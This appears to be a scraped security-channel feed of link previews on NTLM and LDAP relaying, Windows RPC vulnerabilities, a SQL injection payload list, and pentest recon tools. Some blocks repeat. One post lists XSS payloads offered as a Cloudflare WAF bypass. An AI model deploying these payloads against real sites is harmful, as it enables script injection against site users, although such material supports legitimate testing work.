We Love Relaying Credentials: A Technical Guide to Relaying Credentials Everywhere – SecureAuth
https://www.secureauth.com/blog/we-love-relaying-credentials-a-technical-guide-to-relaying-credentials-everywhere/?utm_source=Twitter&utm_medium=Unpaid&utm_campaign=blog-weLoveRelayingCredentials
https://www.secureauth.com/blog/we-love-relaying-credentials-a-technical-guide-to-relaying-credentials-everywhere/?utm_source=Twitter&utm_medium=Unpaid&utm_campaign=blog-weLoveRelayingCredentials
SecureAuth
We Love Relaying Credentials: A Technical Guide to Relaying Credentials Everywhere
NTLM relay is a well-known technique that has been with us for many years and never seems to go away.
👍1
Akamai Blog | Critical Remote Code Execution Vulnerabilities in Windows RPC Runtime
https://www.akamai.com/blog/security/critical-remote-code-execution-vulnerabilities-windows-rpc-runtime
https://www.akamai.com/blog/security/critical-remote-code-execution-vulnerabilities-windows-rpc-runtime
Akamai
Remote Code Execution Vulnerabilities in RPC | Akamai Blog | Akamai
Microsoft’s April 2022 Patch Tuesday introduced patches to more than a hundred new vulnerabilities in various components. Three critical vulnerabilities were found and patched in Windows RPC (Remote Procedure Call) runtime:
CVE-2022-24492 and CVE-2022-24528…
CVE-2022-24492 and CVE-2022-24528…
How to Exploit Active Directory ACL Attack Paths Through LDAP Relaying Attacks - Praetorian
https://www.praetorian.com/blog/how-to-exploit-active-directory-acl-attack-paths-through-ldap-relaying-attacks/
https://www.praetorian.com/blog/how-to-exploit-active-directory-acl-attack-paths-through-ldap-relaying-attacks/
Praetorian
How to Exploit Active Directory ACL Attack Paths Through LDAP Relaying Attacks
Overview This article describes methods by which an attacker can induce a victim user into authenticating using the NT Lan Manager (NTLM) Authentication Protocol to an attacker-controlled “Intranet” site, even in instances where that site points to an external…
GitHub - payloadbox/sql-injection-payload-list: 🎯 SQL Injection Payload List
https://github.com/payloadbox/sql-injection-payload-list
https://github.com/payloadbox/sql-injection-payload-list
Some Cloudflare's latest XSS Bypass:
XSS"><body %00 onControl hello onmouseleave=confirm(domain) x>XSS
XSS"><html><select %00 onControl onpointerenter=prompt(domain) hello>
XSS"><input %00 onControl hello oninput=confirm(domain) x>
XSS"><body %00 onControl hello onmouseleave=confirm(domain) x>XSS
XSS"><html><select %00 onControl onpointerenter=prompt(domain) hello>
XSS"><input %00 onControl hello oninput=confirm(domain) x>
Pentesting_Active_directory - XMind - Mind Mapping Software
https://www.xmind.net/m/5dypm8/
https://www.xmind.net/m/5dypm8/
👍1
GitHub - epi052/feroxbuster: A fast, simple, recursive content discovery tool written in Rust.
https://github.com/epi052/feroxbuster
https://github.com/epi052/feroxbuster
GitHub
GitHub - epi052/feroxbuster: A fast, simple, recursive content discovery tool written in Rust.
A fast, simple, recursive content discovery tool written in Rust. - epi052/feroxbuster
Best search 🔎 engines for Pentesters and Security Professionals.
→ google .com
→ Shodan .io
→ Censys .io
→ Hunter .io
→ redhuntlabs .com
→ fullhunt .io
→ onyphe .io
→ fofa .so
→ socradar .io
→ synapsint .com
→ binaryedge .io
→ ivre .rocks
→ crt .sh
→ spyse .com
→ vulners .com
→ PublicWWW .com
→ Pulsedive .com
→ ZoomEye .org
→ intelx .io
→ WiGLE .net
→ reposify .com
→ viz. greynoise .io
→ google .com
→ Shodan .io
→ Censys .io
→ Hunter .io
→ redhuntlabs .com
→ fullhunt .io
→ onyphe .io
→ fofa .so
→ socradar .io
→ synapsint .com
→ binaryedge .io
→ ivre .rocks
→ crt .sh
→ spyse .com
→ vulners .com
→ PublicWWW .com
→ Pulsedive .com
→ ZoomEye .org
→ intelx .io
→ WiGLE .net
→ reposify .com
→ viz. greynoise .io